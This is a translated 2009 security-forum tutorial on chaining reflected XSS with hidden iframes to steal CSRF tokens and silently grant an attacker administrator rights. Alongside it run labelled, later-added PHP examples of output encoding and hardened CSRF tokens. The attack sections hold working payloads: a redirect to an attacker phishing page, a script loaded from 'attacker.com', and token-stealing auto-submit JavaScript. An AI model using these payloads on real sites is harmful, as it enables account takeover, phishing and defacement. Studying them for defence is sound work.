Using XSS to bypass CSRF protection
<?php
// Author: Nytro
// Contact: nytro_rst@yahoo.com
// Translated by: SENEQ_o
// Published on: 28 October 2009
// Romanian Security Team
?>
1) About XSS
2) About CSRF
3) Using XSS to bypass CSRF protection
Hello, in this tutorial I will teach you how to use XSS to bypass CSRF protection. If you are familiar with the terms XSS and CSRF you can skip the first two chapters, but I recommend you read them.
Warning! This tutorial was written for educational purposes only, and I take no responsibility for your acts.
1) About XSS (Cross Site Scripting)
XSS is probably the most common web vulnerability. This vulnerability affects the client, more precisely the user of the bugged application. It is not so dangerous, but it can lead to many problems. Many websites have this problem, but they don't have to worry much, because few people actually exploit it.
The main idea is simple. The web application receives data from the client, usually through GET, and then displays it. For example:
if(isset($_GET['text']))
{
    $var = $_GET['text'];
    print $var; // the value is echoed back without any encoding
}
For a request such as:
http://www.site.com/script.php?text=test
what will be displayed is "test". But what happens when somebody makes the following request:
http://www.site.com/script.php?text=<script>cod_javascript</script>
Well, the javascript code will be executed. Maybe you're wondering: why would the attacker run the javascript code using GET, when he could just type it in the browser (javascript:code_javascript;)? Well, the code is not designed for him. He can send the link:
http://www.site.com/script.php?text=<script>cod_javascript</script>
to someone else; when the victim accesses it, the javascript code will run on the victim's computer.
Most often, this problem is found in the search box. Regardless of whether the data is sent using POST or GET, the returned message will be something like "You searched for 'test'", but if the request is:
http://www.site.com/script.php?text=<script>cod_javascript</script>
the thing displayed will be "You searched for ''" and the javascript code will be run.
But what can be done with that code, how harmful can it be?
Well, there are plenty of things to do. For example, the popularity of XSS comes from cookie stealing.
As you all know, having the cookies of a victim who is logged on a website, you can use them to log yourself on that website using the victim's account. This can be easily done using a cookie grabber.
A cookie grabber is a PHP file which receives data using GET (it can also receive data using POST) and writes it in a file on the attacker's server. It is necessary that the script runs on the bugged application, because if it runs on another application, document.cookie will not return the cookies we want. But this is not what I planned to cover in this tutorial; you will find plenty of information about this elsewhere.
XSS can also be used for phishing, for stealing authentication information from the victim, just as simply:
The attacker offers a link to the victim, such as:
http://www.site.com/script.php?text=<script>document.location.href="http://www.site-attacker.com/phishing.html"</script>
The victim is redirected to the phishing page (scam page), logs on the page, and the attacker steals the private data. This can also be done using <iframe>. For example:
<iframe src="http://attacker.com/phishing_page_identical_copy_of_the_aplication_page.html"
        style="z-index: 0; position: absolute; top: 0; left: 0; height: 100%; width: 100%;"></iframe>
It is very easy: using CSS, we create an iframe which covers the whole page. When the user sees that the link is "ok", he logs on.
The problem with this vulnerability is that the link is "ok", so the victim may not be able to tell whether there is a problem or not. Of course, she can figure it out from the query, but it can be encoded so that it is hard to read.
Usually, if you want to know if a website is vulnerable, you can use:
<script>alert(1)</script> or "><script>alert(1)</script>
Well, there are many possibilities depending on the browser you use. You can find a big list here: http://ha.ckers.org/xss.html
You can also use XSS to make "a page cooler", for fun. For example, visit www.alonia.ro and in the search box type:
<script>document.images[4].src="http://rstcenter.com/up/director/RST.png"</script>
There are many things that can be done. You will see later how to bypass CSRF filters.
In order to get rid of this problem, you have to get rid of the < and > characters.
To the PHP programmers I recommend the htmlspecialchars function (or htmlentities) with the second parameter ENT_QUOTES. Both functions convert ">" to "&gt;" and "<" to "&lt;", and if you use them with the second parameter ENT_QUOTES, the function will transform even the (") and (') into HTML entities. Thereby, for a request such as:
http://site.com/script.php?text=<script>alert('1')</script>
in the source it will be displayed as
&lt;script&gt;alert(&#039;1&#039;)&lt;/script&gt;
but the rendered text will be
<script>alert('1')</script>
and you will have no problems whatsoever. I also recommend using the second parameter, because it can save you from many problems.
The code should look something like this:
if(isset($_GET['text']))
{
    $var = $_GET['text'];
    print htmlentities($var, ENT_QUOTES);
    // Or print htmlspecialchars($var, ENT_QUOTES);
}
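As an added example (not code from the original tutorial or its author), the following PHP applies the encoding described above in the two places a search page typically echoes the query, a text node and a single-quoted attribute, and compares ENT_COMPAT with ENT_QUOTES on the tutorial's two probe strings plus one that targets a single-quoted attribute. The helper e(), render_search() and the probe strings are assumptions made for this example.

```php
<?php
// Added example (not code from the original tutorial): a small output-encoding
// helper, e(), and a demonstration of why ENT_QUOTES matters when the echoed
// value lands inside an HTML attribute. The helper name and the probe strings
// are assumptions made for this example.
declare(strict_types=1);

// Encode untrusted text for an HTML text node or a quoted attribute value.
// ENT_QUOTES encodes both " and '; ENT_SUBSTITUTE keeps invalid UTF-8 from
// blanking the whole string; naming the charset avoids relying on the default.
function e(string $untrusted): string
{
    return htmlspecialchars($untrusted, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Renders the two places the tutorial's search page echoes the query: the
// "You searched for '...'" message and the search box that keeps the value.
function render_search(string $query): string
{
    return "You searched for '" . e($query) . "'<br />\n"
         . "<input type=\"text\" name=\"text\" value='" . e($query) . "' />";
}

// Constructed probes: the two from the tutorial plus one that breaks out of a
// single-quoted attribute, which ENT_COMPAT (no ENT_QUOTES) does not encode.
$probes = [
    '<script>alert(1)</script>',
    '"><script>alert(1)</script>',
    "' onmouseover='alert(1)",
];

foreach ($probes as $p) {
    echo "input      : $p\n";
    echo "ENT_COMPAT : " . htmlspecialchars($p, ENT_COMPAT, 'UTF-8') . "\n";
    echo "ENT_QUOTES : " . e($p) . "\n\n";
}

// The hardened page: whatever arrives in ?text= is encoded at the moment it
// is written out, so the probes above are displayed as text, not executed.
if (isset($_GET['text'])) {
    echo render_search((string) $_GET['text']);
}
```

The third probe is the one to watch: with ENT_COMPAT the single quote survives, so inside value='...' it closes the attribute and the rest of the probe becomes an event handler; with ENT_QUOTES it is written as an entity and stays inert.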
You may ask yourself if an XSS can be exploited if the data is sent using POST. The answer is yes and no. If the data is sent using POST, the victim can not be directly attacked; it can't just click on the link and that's all, so we can say the XSS can't be exploited. But the victim can access a random page made by the attacker, and that page will send the malicious code using POST to the vulnerable web application page. For example:
<form style="display: none;" method="post" action="http://www.alonia.ro/search">
    <input type="hidden" name="searchStr" value="<script>alert(1)</script>"/>
    <input name="send" type="submit" id="send" />
</form>
<script>
document.forms[0].send.click();
</script>
The idea is simple: we create a form like the one of the bugged application (make sure the names of the fields are the same) and we practically automate a search, i.e. we submit that query ourselves, thereby sending the data through POST. So the victim is redirected towards our page, and the javascript code is executed.
2) About CSRF (Cross Site Request Forgery)
CSRF is a common vulnerability because few know about it. It affects the client just as XSS does; more precisely, both XSS and CSRF target the users of web applications.
What makes this vulnerability possible is the automation of an action, this action being made in general by the application administrators. For this type of vulnerability, the victims are authenticated users of the application, and CSRF lets the attacker automate some of the actions they can do.
For example, an administrator has, in the administration panel, a page where he can delete an article just by clicking on a link. For example:
http://www.site.com/admin/delete_articol?articol_id=123
The attacker can make a page in which he puts the following code:
<iframe src="http://www.site.com/admin/delete_articol?articol_id=123" width="0" height="0"></iframe>
When the victim, in our case the administrator, visits this webpage, he will make a request to
http://www.site.com/admin/delete_articol?articol_id=123
without knowing, and he will delete the article with that database id. Of course, the id can be sent using POST, from a form, but the attacker can copy that form and send that data using javascript:
document.forms[0].trimite.click();
This is the main idea. It is very easy for an application to be protected against this problem, and we can enumerate some methods. The most used method, and a very good one, is using tokens: random strings which are generated and kept in the session at the time we log in.
if(isset($_POST['login']))
{
    // Check login
    $_SESSION['token'] = Random();
}
I use this function; it has some flaws, but it does what I want it to do, and I can specify what characters I want in the token and its length.
function Random()
{
    // the alphabet: A-Z, a-z, 0-9
    $chars = str_split('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789');
    shuffle($chars);
    $sir = substr(implode('', $chars), 0, 10);
    return $sir;
}
We can use these tokens for verifying if a request is truly made by the person itself and not by CSRF. I should better give an example. For example, when deleting an article, when we create the delete link, we add this token:
print '<a href="admin.php?action=delete_articol&articol_id=' . $date['id'] . '&token=' . $_SESSION['token'] . '">Delete</a>';
Therefore, the link for the delete will be something like:
http://www.site.com/admin.php?action=delete_articol&articol_id=123&token=qdY4f6FTpO
All we need to verify before the action, in our case before deleting the article, is that the token is equal to the one from the session:
if(isset($_GET['action']) && $_GET['action'] == 'delete_articol')
{
    if(isset($_GET['token']) && $_SESSION['token'] == $_GET['token'])
    {
        // delete_specified_article();
    }
    else print 'The token does not match, you may be a victim of CSRF';
}
Thereby, the attacker will never know this token and he will not be able to create a valid link to delete the article. Other methods, safer but more "time consuming", would be to ask for the user's/administrator's password for every important action, or to add a CAPTCHA image and verify the text entered by the user.
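As an added example (not the tutorial's own code), here is the token scheme just described, generate at login, embed in the form, verify before the action, written in a hardened form: random_bytes() instead of the shuffle()-based Random(), hash_equals() instead of ==, and the delete action accepted over POST only. The names csrf_token(), csrf_check() and delete_article() are assumptions made for this example.

```php
<?php
// Added example (not the tutorial's code): a hardened version of the token
// scheme described above. random_bytes() replaces the shuffle()-based
// Random(), hash_equals() replaces the == comparison, and the action is moved
// to POST. csrf_token(), csrf_check() and delete_article() are names assumed
// for this example.
declare(strict_types=1);
session_start();

// One token per session, from the OS CSPRNG. The tutorial's Random() draws
// 10 distinct characters from a 62-character alphabet with shuffle(), which
// uses a non-cryptographic generator and yields at most about 58 bits even
// if that generator were perfect.
function csrf_token(): string
{
    if (empty($_SESSION['token'])) {
        $_SESSION['token'] = bin2hex(random_bytes(32)); // 64 hex characters
    }
    return $_SESSION['token'];
}

// Constant-time comparison. With ==, PHP compares numeric-looking strings as
// numbers ("0e1" == "0e2" is true), and a byte-by-byte comparison that stops
// at the first difference leaks timing; hash_equals() avoids both.
function csrf_check($submitted): bool
{
    if (!isset($_SESSION['token']) || !is_string($submitted)) {
        return false;
    }
    return hash_equals($_SESSION['token'], $submitted);
}

function delete_article(int $id): void
{
    // the real deletion goes here; left empty for the example
}

// The state-changing action is accepted only over POST and only with a valid
// token, so a link or a hidden iframe on the attacker's page cannot trigger it.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['delete_articol'])) {
    if (!csrf_check($_POST['token'] ?? null)) {
        http_response_code(403);
        exit('The token does not match; this request may be a CSRF attempt.');
    }
    $id = (int) ($_POST['articol_id'] ?? 0);
    delete_article($id);
    echo 'Article ' . $id . ' deleted.';
}

// The form that issues the request carries the token in a hidden field,
// HTML-encoded like any other value written into the page.
$t = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
echo '<form method="post" action="admin.php">'
   . '<input type="hidden" name="token" value="' . $t . '" />'
   . '<input type="hidden" name="articol_id" value="123" />'
   . '<button type="submit" name="delete_articol" value="1">Delete</button>'
   . '</form>';
```

Using POST keeps the token out of the URL, browser history and Referer headers, which a GET link like the one above does not. Note that this closes the CSRF hole only as long as no page on the same origin reflects untrusted input; the tutorial's third part shows why.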
3) Using XSS for bypassing CSRF protection
Well, now we get to the important part: how to use XSS to bypass CSRF protection. This technique applies to those websites which have an application guarded against CSRF, and another page which is vulnerable to XSS. Using that XSS we can bypass the CSRF protection and we can automate any action that anybody can do on the application without problems.
For example, one website has a little application on the main page which is vulnerable to XSS, and a forum on /forum which is not vulnerable to CSRF. We will see how we can use that XSS to bypass the CSRF protection of the forum. As I said earlier, there are many methods to prevent CSRF, but the most used is that of tokens and hidden fields
(<input type="hidden" name="token" value="<?php print $_SESSION['token']; ?>" />)
which are verified before the action is executed. We will try to get past this type of protection, so that we have time to do what we really want.
Let's start with the base idea: how to get past CSRF protection, since we do not know that token. The solution is a piece of cake: we find it, and we can do this very easily using javascript. Let's take an example, adding a new administrator given the name of the user who will become administrator. This will happen in the folder /admin which is not vulnerable to CSRF:
/admin/admin.php?action=add_admin (for example...):
<form method="get" action="add_admin.php">
Name: <input type="text" name="name" value="" /><br />
<input type="hidden" name="token" value="<?php print $_SESSION['token']; ?>" />
<input type="submit" name="submit" value="add admin" /><br />
</form>
Well, this script adds an administrator. When the button is clicked the main admin will make a request such as:
http://www.site.com/add_admin.php?name=Nytro&token=1htFI0iA9s&submit
When verifying, the token from the session will be the same as the one sent from the form, and Nytro will be an administrator.
<?php
session_start();
if(isset($_GET['submit']))
{
if($_SESSION['token'] == $_GET['token'])
{
// we_make_nytro_admin();
print 'Nytro is now an admin.';
}
else print 'Token invalid _|_ :)';
}
?>
Now let's see what we can do to obtain that token. In the examples I will use GET, so that it is easier to understand, but you could apply the same with data sent through POST.
We will consider that the vulnerable application is on the main page (index.php) and contains the following code:
index.php:
<?php
if(isset($_GET['name']))
{
print 'Hello, ' . $_GET['name'];
}
?>
To simplify things, we won't write our javascript code directly in the request; instead we will write it in a .js file which we will consider uploaded at:
http://www.attacker.com/script.js
In the request we will use:
http://www.vulnerable_website.com/index.php?name=<script src="http://www.attacker.com/script.js"></script>
So let's see how we can find out the token using javascript. Very easy! We will use a simple <iframe> in which we will open the page from which the CSRF-protected request is made (/admin/admin.php?action=add_admin) and we will read it. Then we will build the link and we will redirect the victim (administrator) towards it, or we will write it in an <iframe>.
Let's do it.
Firstly, from our javascript code we will have to create our iframe, which will open the administration page. We will put everything in a function which we will call at the onload event of the iframe, so as to be sure that the page has loaded.
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin" width="0" height="0" onload="read()"></iframe>');
Then we are going to write the read() function, which reads the token and displays it in an alert.
function read()
{
    alert(document.getElementById("iframe").contentDocument.forms[0].token.value);
}
Thereby, we are going to use a request such as:
http://www.vulnerable_website.com/index.php?name=<script src="http://www.attacker.com/script.js"></script>
where
http://www.attacker.com/script.js
is:
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin" width="0" height="0" onload="read()"></iframe>');
function read()
{
    alert(document.getElementById("iframe").contentDocument.forms[0].token.value);
}
There should be an alert with the token we want. All we have to do is to create a link with that token and redirect the user towards it. We will modify the read() function for this:
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin" width="0" height="0" onload="read()"></iframe>');
function read()
{
    var name = 'Nytro';
    var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
    document.location.href = 'http://127.0.0.1/admin/add_admin.php?name=' + name + '&token=' + token + '&submit';
}
Thereby, if the victim makes a request to:
http://site_victim.com/index.php?name=<script src="http://127.0.0.1/script.js"></script>
it will be redirected to:
http://site_victim.com/admin/add_admin.php?name=Nytro&token=aH52G7jtC3&submit
for example, and Nytro will be admin. In order for the victim not to realize he was the victim of such an attack, we put everything in an iframe:
<iframe src='http://site_victim.com/index.php?name=<script src="http://127.0.0.1/script.js"></script>' width="300" height="300"></iframe>
Well, this was the base idea. Things can get a lot more complicated. We can use XSS to obtain administrator rights on a vBulletin or phpBB forum, but things become complicated: if we needed to send the data 2 times using POST we would need an iframe in an iframe, and so on, so there is no use in making it complicated, but keep in mind that it is possible. Also, usually the data will have to be sent using POST. No problem! Just read the token as we read it earlier and create a form like the one of the page protected by CSRF. In our example, instead of redirecting, we will modify our script this way:
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin" width="0" height="0" onload="read()"></iframe>');
function read()
{
    var name = 'Nytro';
    var token = document.getElementById("iframe").contentDocument.forms[0].token.value;
    document.writeln('<form width="0" height="0" method="post" action="/admin/add_admin.php">');
    document.writeln('<input type="text" name="name" value="' + name + '" /><br />');
    document.writeln('<input type="hidden" name="token" value="' + token + '" />');
    document.writeln('<input type="submit" name="submit" value="Add_admin" /><br />');
    document.writeln('</form>');
    document.forms[0].submit.click();
}
Be careful with the forms, with the actions and the inputs of the forms. It is a little tricky using POST, but it is possible. Now you may want to try putting in the iframe another page, such as http://www.google.ro or another website, and do the same. Well, it is not possible because of the browser; it won't let you, you will get "Permission denied". It won't allow access through a frame (or anything else) to a page from another server, because of security measures (taken by Netscape a long time ago: 'data contamination').
Maybe it is complicated to create links or generate forms... Actually you can do this much easier. Even though it won't work in all browsers (in some, contentDocument is read-only; in Mozilla it is not), how can it be easier? Create an iframe with the page that is protected by CSRF, write the wanted name in the form and click on the submit button. So our script, no matter whether the data is sent by GET or by POST, will look like this:
document.writeln('<iframe id="iframe" src="/admin/admin.php?action=add_admin" width="0" height="0" onload="read()"></iframe>');
function read()
{
    var name = 'Nytro';
    document.getElementById("iframe").contentDocument.forms[0].name.value = name; // write the name
    document.getElementById("iframe").contentDocument.forms[0].submit.click();   // press the submit button
}
What can be easier than this?
This was all. I hope you understood, and I hope you don't apply what you learned. I repeat: I wrote this tutorial for educational purposes only. If you have questions, suggestions or if you found flaws, contact me.
Have a good day!
Nytro @ Romanian Security Team [ http://www.rstcenter.com/forum/ ]
http://packetstorm.codar.com.br/papers/attack/Using_XSS_to_bypass_CSRF_protection.pdf